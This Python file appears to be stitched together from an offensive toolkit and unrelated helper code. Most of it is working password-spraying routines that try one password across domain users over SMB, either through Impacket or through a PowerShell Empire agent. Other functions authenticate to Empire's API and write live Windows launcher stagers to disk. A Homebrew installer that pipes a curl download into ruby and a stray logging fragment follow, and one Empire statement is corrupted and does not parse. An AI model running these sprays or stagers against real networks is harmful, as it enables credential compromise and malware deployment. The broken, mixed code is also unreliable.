def impacket_spray_3(duser, dpass, domain, dc_ip, nusers, sleep, spraypassword, UseDomainAct=True):
    """Try one password across several hosts, one SMB login per (user, host) pair.

    Users come from get_users() when UseDomainAct is true, otherwise from
    generate_random_users(). Hosts come from get_computers() and are then
    filtered by get_live_hosts(). Each selected user is paired by index with
    one host and passed to smb_login() together with spraypassword and sleep.

    Returns None in every case; a failed user or computer selection is
    reported through print_error() and ends the run early.

    NOTE(review): the status text says "badPwdCount>=3", but the filter itself
    lives in get_users(), which is not visible here -- confirm which accounts
    it returns before using this where an account lockout policy applies.
    NOTE(review): smb_login() receives a single username here, while
    impacket_spray_1/impacket_spray_2 pass the whole list -- confirm it
    accepts both forms.
    """
    login_domain = domain if UseDomainAct else ""

    if not UseDomainAct:
        users = generate_random_users(nusers)
        print_info("Using " + str(len(users)) + " randomly generated usernames (mimicking local accounts) ...")
    else:
        print_info("Querying for domain users with badPwdCount>=3...")
        try:
            candidates = set(get_users(duser, dpass, domain, dc_ip))
            users = random.sample(candidates, nusers)
        except:
            # NOTE(review): the bare except reports every failure (query
            # errors, a TypeError from sampling a set on newer Python
            # versions, even KeyboardInterrupt) as "not enough users".
            print_error("Did not find enough users, try a lower Nusers value")
            return
        print_status("Using " + str(len(users)) + " randomly picked domain users for the spray...")

    print_info("Querying for domain computers that authenticated within the last day...")
    try:
        known_hosts = set(get_computers(duser, dpass, domain, dc_ip))
        computers = random.sample(known_hosts, nusers)
    except:
        # Same catch-all as above: the message may not match the real cause.
        print_error("Did not find enough computers, try a lower Nusers value")
        return
    print_status("Obtained " + str(len(computers)) + " computers.")

    print_info("Identifying live hosts ...")
    computers = get_live_hosts(domain, computers, dc_ip)
    print_status("Using " + str(len(computers)) + " randomly picked domain computers for the spray...")

    if sleep > 0:
        print_status("Sleeping " + str(sleep) + " seconds between each authentication attempt...")

    # Fewer live hosts than requested users: drop the surplus users so that
    # every remaining user still has a host at the same index.
    if len(computers) < nusers:
        users = users[:len(computers)]

    for position, account in enumerate(users):
        smb_login(login_domain, account, spraypassword, computers[position], sleep)
def impacket_spray_1(duser, dpass, domain, dc_ip, nusers, sleep, spraypassword, UseDomainAct=True):
    """Try one password for many users against a single, randomly chosen DC.

    The DC list comes from get_dcs() filtered by get_live_hosts(). Users come
    from get_users() when UseDomainAct is true (logins use ``domain``),
    otherwise from generate_random_users() (logins use an empty domain). The
    whole user list is handed to smb_login() in one call.

    Returns None; a failed user selection is reported through print_error()
    and ends the run early.

    NOTE(review): every attempt lands on one DC, and the "badPwdCount>=3"
    wording is only log text -- the real filter is in get_users(), not shown
    here. Confirm it before running where a lockout policy applies.
    NOTE(review): random.choice() raises IndexError if no DC is reported
    live; that case is not handled.
    """
    print_info("Querying for Domain Controllers...")
    reachable_dcs = get_live_hosts(domain, get_dcs(duser, dpass, domain, dc_ip), dc_ip)
    dc = random.choice(reachable_dcs)
    print_status("Randomly picked DC : " + dc[0] + " - " + dc[1])

    if UseDomainAct:
        print_info("Querying for domain users with badPwdCount>=3...")
        try:
            directory_users = set(get_users(duser, dpass, domain, dc_ip))
            users = random.sample(directory_users, nusers)
        except:
            # NOTE(review): catch-all; any failure is reported as a shortage
            # of users, whatever the real cause.
            print_error("Did not find enough users, try a lower Nusers value")
            return
        print_status("Using " + str(len(users)) + " randomly picked domain users for the spray...")
        login_domain = domain
    else:
        users = generate_random_users(nusers)
        print_info("Using " + str(len(users)) + " randomly generated usernames (mimic local account usage) ...")
        login_domain = ""

    if sleep > 0:
        print_status("Sleeping " + str(sleep) + " seconds between each authentication attempt...")
    smb_login(login_domain, users, spraypassword, dc, sleep)
def empire_spray_2(empiresession, agentid, duser, dpass, domain, dc_ip, nusers, spraypassword, sleep, UseDomainAct=True, UseKerberos=True):
    """Run the Empire smblogin module once against one randomly chosen host.

    A host is picked from get_computers() filtered by get_live_hosts(). A
    comma-joined username list is then sent, together with spraypassword and
    sleep, to the "powershell/situational_awareness/network/smblogin" module
    through ``empiresession`` on agent ``agentid``. The module results are
    handed to process_empire_results(). Returns None.

    NOTE(review): the "badPwdCount>=3" wording is only log text; the actual
    filter lives in get_users(), which is not shown here -- confirm it before
    running where a lockout policy applies.
    """
    ## Against one random host on the domain
    print_info("Querying for domain computers that authenticated within the last day...")
    try:
        computers = random.sample(set(get_computers(duser, dpass, domain, dc_ip)), nusers)
    except:
        # NOTE(review): bare except -- any failure (not only "too few
        # computers") is reported with this message.
        print_error("Did not find enough computers, try a lower Nusers value")
        return
    print_status("Obtained " + str(len(computers)) + " computers.")
    print_info("Identifying live hosts ...")
    computers = get_live_hosts(domain,computers,dc_ip)
    # random.choice() raises IndexError when no host is reported live; that
    # case is not handled here.
    host = random.choice(computers)
    print_status("Randomly picked domain computer : " + host[0] + " - " + host[1])
    # presumably host[0] is the host name and host[1] its address -- TODO confirm
    computername = host[0] if UseKerberos else host[1]
    if UseDomainAct:
        print_info("Querying for domain users with badPwdCount>=3...")
        try:
            users = random.sample(set(get_users(duser, dpass, domain, dc_ip)), nusers)
        except:
            # Same catch-all as above.
            print_error("Did not find enough users, try a lower Nusers value")
            return
        print_status("Using " + str(len(users)) + " randomly picked domain users for the spray.")
    else:
        users = generate_random_users(nusers)
        print_info("Using " + str(len(users)) + " randomly generated usernames (mimic local account usage) ...")
    usernames = []
    for user in users:
        # Without domain accounts each entry is replaced by a freshly
        # generated name, so the list built above only sets the count.
        usernames.append(user if UseDomainAct else generate_random_users(10)[0])
    usernames = ",".join(usernames)
    if sleep > 0:
        print_status("Sleeping " + str((sleep)) + " seconds between each authentication attempt...")
    # NOTE(review): the "******" fragment in the 'UserName' values looks like
    # an export/redaction artefact. As written, the trailing backslash sits
    # outside any string literal, so this statement does not parse -- restore
    # the literal from the upstream file before relying on this function.
    module_options = {'UserName': "******"" + usernames + "\"", 'ComputerName': computername, 'Password': spraypassword, 'Domain': domain, 'Sleep':str(sleep)} if UseDomainAct else {'UserName': "******"" + usernames + "\"", 'Domain':'', 'ComputerName': computername, 'Password': spraypassword,'Sleep':str(sleep)}
    results=empiresession.execute_module_with_results("powershell/situational_awareness/network/smblogin", agentid, module_options)
    print_status("Obtained results from the Powershell Empire agent")
    process_empire_results(results,host)
def empire_spray_3(empiresession, agentid, duser, dpass, domain, dc_ip, nusers, spraypassowrd, sleep, UseDomainAct=True, UseKerberos=True):
    """Run the Empire smblogin module once per (user, host) pair.

    Users come from get_users() or generate_random_users(); hosts come from
    get_computers() filtered by get_live_hosts(). For each index the module
    "powershell/situational_awareness/network/smblogin" is executed through
    ``empiresession`` on agent ``agentid`` with 'Sleep' fixed to '0'. The
    pause between executions is done locally with time.sleep(sleep). Each
    result is handed to process_empire_results(). Returns None.

    The parameter name ``spraypassowrd`` is misspelled in the signature and
    is kept because callers may pass it by keyword.

    NOTE(review): the "badPwdCount>=3" wording is only log text; the real
    filter is in get_users(), not shown here -- confirm it before running
    where a lockout policy applies.
    """
    if not UseDomainAct:
        users = generate_random_users(nusers)
        print_info("Using " + str(len(users)) + " randomly generated usernames (mimic local account usage) ...")
    else:
        print_info("Querying for domain users with badPwdCount>=3...")
        try:
            directory_users = set(get_users(duser, dpass, domain, dc_ip))
            users = random.sample(directory_users, nusers)
        except:
            # NOTE(review): catch-all; the message may not match the cause.
            print_error("Did not find enough users, try a lower Nusers value")
            return
        print_status("Using " + str(len(users)) + " randomly picked domain users for the spray...")

    print_info("Querying for domain computers that authenticated within the last day...")
    try:
        known_hosts = set(get_computers(duser, dpass, domain, dc_ip))
        computers = random.sample(known_hosts, nusers)
    except:
        # Same catch-all as above.
        print_error("Did not find enough computers, try a lower Nusers value")
        return
    print_status("Obtained " + str(len(computers)) + " computers.")

    print_info("Identifying live hosts ...")
    computers = get_live_hosts(domain, computers, dc_ip)
    print_status("Using " + str(len(computers)) + " randomly picked domain computers for the spray...")

    if sleep > 0:
        print_status("Sleeping " + str(sleep) + " seconds between each empire module execution...")

    # Keep one user per live host when fewer hosts answered than requested.
    if len(computers) < nusers:
        users = users[:len(computers)]

    module_path = "powershell/situational_awareness/network/smblogin"
    for position, picked in enumerate(users):
        target = computers[position]
        if UseDomainAct:
            account = picked
        else:
            # Without domain accounts a fresh random name is generated per host.
            account = generate_random_users(1)[0]
        # presumably target[0] is the host name and target[1] its address -- TODO confirm
        computername = target[0] if UseKerberos else target[1]

        if UseDomainAct:
            module_options = {'UserName': account, 'ComputerName': computername, 'Password': spraypassowrd, 'Domain': domain, 'Sleep': '0'}
        else:
            module_options = {'UserName': account, 'Domain': '', 'ComputerName': computername, 'Password': spraypassowrd, 'Sleep': '0'}

        results = empiresession.execute_module_with_results(module_path, agentid, module_options)
        print_status("Obtained results from the Powershell Empire agent")
        process_empire_results(results, target)

        # The delay is applied here rather than inside the module (hence 'Sleep': '0').
        if sleep > 0:
            time.sleep(sleep)
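def login(self, host, empire_username, empire_password):
    """Authenticate to the Empire REST API and return the session token.

    Posts the credentials as JSON to ``self.base_url + '/api/admin/login'``.

    Args:
        host: Unused here; the target is taken from ``self.base_url``.
        empire_username: API account name.
        empire_password: API account password.

    Returns:
        The ``token`` value of the JSON response on HTTP 200, otherwise None
        (after reporting the problem through print_error).
    """
    payload = {'username': empire_username, 'password': empire_password}
    headers = {'Content-Type': 'application/json'}
    try:
        # NOTE(review): verify=False disables TLS certificate validation while
        # the API password is in the request body, so the server's identity
        # is not checked. Kept for compatibility with self-signed setups;
        # prefer passing the API's CA bundle/certificate path via `verify`.
        # No timeout is set either, so an unresponsive server blocks here.
        r = requests.post(self.base_url + '/api/admin/login', json=payload, headers=headers, verify=False)
    except (ConnectionError, requests.exceptions.ConnectionError):
        # requests raises its own ConnectionError, which is not a subclass of
        # the builtin one; name both so the handler fires whichever class the
        # bare name is bound to in this module.
        print_error('Connection Error. Check Empire RESTful API')
        return

    if r.status_code != 200:
        print_error('Authentication to Empire RESTful API Failed')
        return

    try:
        return r.json()['token']
    except (ValueError, KeyError, TypeError):
        # A 200 response without a usable JSON token is treated as a failed
        # login instead of raising into the caller.
        print_error('Authentication to Empire RESTful API Failed')
        return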
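def generate_stagers(self, listener='http'):
    """Request a fixed set of Windows launchers from the API and write them to ./stagers.

    For each launcher name a POST is sent to ``self.base_url + '/api/stagers'``
    and the ``Output`` field of the response is written under
    ``os.getcwd() + '/stagers'``. Non-HTA output is base64-decoded and written
    as bytes; HTA output is written as text.

    Args:
        listener: Listener name placed in the request body.

    Returns:
        None. Write failures are reported through print_error() together with
        a traceback, and the loop continues with the next launcher.

    NOTE(review): the written files are live launcher content. Keep the
    output directory out of shared or synced locations and remove it when
    the exercise ends.
    """
    path = os.getcwd() + '/stagers'
    headers = {'Content-Type': 'application/json'}
    launchers = ['windows/launcher_bat', 'windows/launcher_sct', 'windows/hta', 'windows/launcher_xml', 'windows/launcher_vbs']
    for launcher in launchers:
        is_hta = "hta" in launcher
        if is_hta:
            filename = "/" + launcher.replace("windows", "launcher").replace("/", ".")
        else:
            filename = ("/" + launcher[7:]).replace('_', '.')
        stager_options = {'StagerName': launcher, 'Listener': listener}
        # NOTE(review): verify=False skips TLS certificate validation, and the
        # token is sent as URL query parameters, where it can end up in
        # server or proxy logs. Assumes self.token is a mapping such as
        # {'token': ...} -- TODO confirm.
        r = requests.post(self.base_url + '/api/stagers', params=self.token, headers=headers, json=stager_options, verify=False)
        newfile = r.json()[launcher]['Output']
        try:
            # Decide mode and payload first, then open exactly once. The
            # previous code opened the file in text mode and reopened it in
            # binary mode, leaking the first handle, and never closed the
            # file if write() failed.
            if is_hta:
                mode, data = 'w', newfile
            else:
                mode, data = 'wb', base64.b64decode(newfile)
            with open(path + filename, mode) as output_file:
                output_file.write(data)
        except Exception:
            # Best-effort per launcher, but no longer swallows
            # KeyboardInterrupt/SystemExit as the bare except did.
            print_error("Could not create stagers. Check permissions")
            print(traceback.format_exc())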
def impacket_spray_2(duser, dpass, domain, dc_ip, nusers, sleep, spraypassword, UseDomainAct=True):
    """Try one password for many users against a single, randomly chosen host.

    The host is picked from get_computers() filtered by get_live_hosts().
    Users come from get_users() when UseDomainAct is true (logins use
    ``domain``), otherwise from generate_random_users() (logins use an empty
    domain). The whole user list is handed to smb_login() in one call.

    Returns None; a failed computer or user selection is reported through
    print_error() and ends the run early.

    NOTE(review): the "badPwdCount>=3" wording is only log text; the real
    filter is in get_users(), not shown here -- confirm it before running
    where a lockout policy applies.
    NOTE(review): random.choice() raises IndexError when no host is reported
    live; that case is not handled.
    """
    print_info("Querying for domain computers that authenticated within the last day...")
    try:
        known_hosts = set(get_computers(duser, dpass, domain, dc_ip))
        computers = random.sample(known_hosts, nusers)
    except:
        # NOTE(review): catch-all; the message may not match the real cause.
        print_error("Did not find enough computers, try a lower Nusers value")
        return
    print_status("Obtained " + str(len(computers)) + " computers.")

    print_info("Identifying live hosts ...")
    computers = get_live_hosts(domain, computers, dc_ip)
    host = random.choice(computers)
    print_status("Randomly picked domain computer : " + host[0] + " - " + host[1])

    if UseDomainAct:
        print_info("Querying for domain users with badPwdCount>=3...")
        try:
            directory_users = set(get_users(duser, dpass, domain, dc_ip))
            users = random.sample(directory_users, nusers)
        except:
            # Same catch-all as above.
            print_error("Did not find enough users, try a lower Nusers value")
            return
        print_status("Using " + str(len(users)) + " randomly picked domain users for the spray.")
        login_domain = domain
    else:
        users = generate_random_users(nusers)
        print_info("Using " + str(len(users)) + " randomly generated usernames (mimic local account usage) ...")
        login_domain = ""

    if sleep > 0:
        print_status("Sleeping " + str(sleep) + " seconds between each authentication attempt...")
    smb_login(login_domain, users, spraypassword, host, sleep)
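def check_dependency():
    """Make sure Homebrew and the cask tap are available, installing them if needed.

    Does nothing when a brew binary is already present. Otherwise it checks
    for the Xcode Command Line Tools (attempting an install when missing),
    runs the Homebrew installer, and then taps and installs cask.

    Returns:
        None.

    Raises:
        SystemExit: with status 1 when any step reports failure.

    Changes from the previous version: the exit status of each command is
    checked (Popen(...).wait() returns the status, it does not raise, so the
    old try/except blocks never saw a failed install), failures exit
    non-zero, and the installer command line has balanced quotes.
    """
    # /usr/local is the Intel prefix, /opt/homebrew the Apple Silicon one;
    # checking both avoids re-running the installer on a machine that
    # already has brew.
    brew_paths = ("/usr/local/bin/brew", "/opt/homebrew/bin/brew")

    def brew_present():
        return any(os.path.isfile(candidate) for candidate in brew_paths)

    def run(argv):
        # Argument-list form: no shell parses these commands. A missing
        # binary is mapped to a non-zero status instead of raising.
        try:
            return subprocess.call(argv)
        except OSError:
            return 127

    print_status("Checking for OSX package manager...")
    if brew_present():
        return
    print_warning("Brew not found...")

    # Begin automated brew install: check for requirements first.
    print_status("Checking for Xcode Command Line Tools...")
    if run(["xcode-select", "-p"]) != 0:
        print_warning("Xcode Command Line Tools not found...")
        print_status("Attempting install of Xcode Command Line Tools...")
        if run(["xcode-select", "--install"]) != 0:
            print_error("Xcode Command Line Tool install failed. Try to install manually and rerun PTF...")
            sys.exit(1)
        print_status("Xcode CLI Tools installed successfully.")

    # Pre-req test passed, begin brew installation.
    print_status("Beginning brew installation..")
    # NOTE(review): this feeds a script fetched over the network straight
    # into an interpreter with no checksum or signature check; a reviewed,
    # pinned copy would be safer. The URL is kept as the author wrote it --
    # confirm it still resolves to the intended installer.
    # The shell is needed for $(...); the string is constant, so nothing
    # caller-controlled reaches it. The inner quotes around the URL were
    # unbalanced before and are removed.
    installer = 'ruby -e "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/master/install)"'
    # A failed download leaves ruby with an empty script and status 0, so
    # the presence of brew is re-checked as well.
    if subprocess.call(installer, shell=True) != 0 or not brew_present():
        print_error("Something in the brew installtion failed. Try to install manually and rerun PTF...")
        sys.exit(1)

    # Install caskroom.
    print_status("Beginning brew caskroom installtion and configuration")
    cask_steps = (
        ["brew", "tap", "caskroom/cask"],
        ["brew", "install", "caskroom/cask/brew-cask"],
    )
    for argv in cask_steps:
        if run(argv) != 0:
            print_error(
                "Something in the brew caskroom installtion failed. Try to run 'brew install caskroom/cask/brew-cask' manually and rerun PTF..."
            )
            sys.exit(1)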
An indication that something unexpected happened, or indicative of some problem in the near future (e.g. ‘disk space low’). The software is still working as expected. ERROR Due to a more serious problem, the software has not been able to perform some function. CRITICAL A serious error, indicating that the program itself may be unable to continue running. '''
try:
    # Logging output configuration; marked by the author as TESTING ONLY.
    ''' *************************************************** '''
    # If the log file already exists, empty it by redirecting /dev/null into it.
    # NOTE(review): this shells out through os.system and relies on `cat`
    # and /dev/null being available. The file name is relative, so the log
    # is created in whatever the current working directory is.
    if os.path.isfile("ptf-output.log"):
        os.system("cat /dev/null > ptf-output.log")
    # basicConfig() returns None; `log` is rebound to logging.info two lines
    # further down, so this first assignment has no lasting effect.
    log = logging.basicConfig(filename="ptf-output.log", level=logging.INFO)
    #log = logging.getLogger("PTF Basic Logger")
    # Module-level shortcuts to the root logger's functions.
    log = logging.info
    info = logging.info
    debug = logging.debug
    error = logging.error
    critical = logging.critical
    ''' *************************************************** '''
except Exception as error:
    # NOTE(review): `as error` reuses the name bound to logging.error above;
    # inside this handler `error` is the caught exception.
    print_error(
        "Ooops! There seems to be a mistake somewhere in src.ptflogger module")
    print_error(error)
    # sys.exit() with no argument ends the process with status 0.
    sys.exit()